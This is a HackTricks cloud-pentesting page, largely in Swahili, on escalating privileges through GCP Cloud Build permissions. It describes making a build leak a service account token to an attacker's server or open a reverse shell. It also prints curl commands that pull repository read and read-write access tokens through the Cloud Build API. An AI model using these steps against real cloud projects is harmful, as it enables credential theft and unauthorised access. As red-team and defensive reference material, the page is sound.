GCP - Cloudbuild Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

cloudbuild

Kwa maelezo zaidi kuhusu Cloud Build angalia:

`cloudbuild.builds.create`

Kwa ruhusa hii unaweza kuwasilisha cloud build. Mashine ya cloudbuild itakuwa na token ya Cloudbuild Service Account katika mfumo wake wa faili kwa default: <PROJECT_NUMBER>@cloudbuild.gserviceaccount.com. Hata hivyo, unaweza kuashiria akaunti yoyote ya huduma ndani ya mradi katika usanidi wa cloudbuild. Hivyo, unaweza tu kufanya mashine itoe token hiyo kwa seva yako au pata shell ya kurudi ndani yake na upate token hiyo (faili inayoshikilia token inaweza kubadilika).

Unaweza kupata script ya asili ya exploit hapa kwenye GitHub (lakini eneo inachukua token kutoka halikufanya kazi kwangu). Hivyo, angalia script ya kuandaa kuunda, kutumia na kusafisha mazingira yenye udhaifu hapa na script ya python kupata shell ya kurudi ndani ya mashine ya cloudbuild na kuiba token hiyo hapa (katika msimbo unaweza kupata jinsi ya kuashiria akaunti nyingine za huduma).

Kwa maelezo ya kina zaidi, tembelea https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/

`cloudbuild.builds.update`

Kwa uwezekano na ruhusa hii utaweza k updates cloud build na kuiba token ya akaunti ya huduma kama ilivyofanywa na ruhusa ya awali (lakini kwa bahati mbaya wakati wa kuandika hii sikuweza kupata njia yoyote ya kuita API hiyo).

TODO

`cloudbuild.repositories.accessReadToken`

Kwa ruhusa hii mtumiaji anaweza kupata token ya ufikiaji wa kusoma inayotumika kufikia hazina:

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
-d '{}' \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>/repositories/<repo-id>:accessReadToken"

`cloudbuild.repositories.accessReadWriteToken`

Kwa ruhusa hii, mtumiaji anaweza kupata token ya ufikiaji wa kusoma na kuandika inayotumika kufikia hifadhi:

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
-d '{}' \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>/repositories/<repo-id>:accessReadWriteToken"

`cloudbuild.connections.fetchLinkableRepositories`

Kwa ruhusa hii unaweza kupata repos ambazo muunganisho una ufikiaji:

curl -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>:fetchLinkableRepositories"

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousGCP - ClientAuthConfig Privesc NextGCP - Cloudfunctions Privesc

Last updated 3 days ago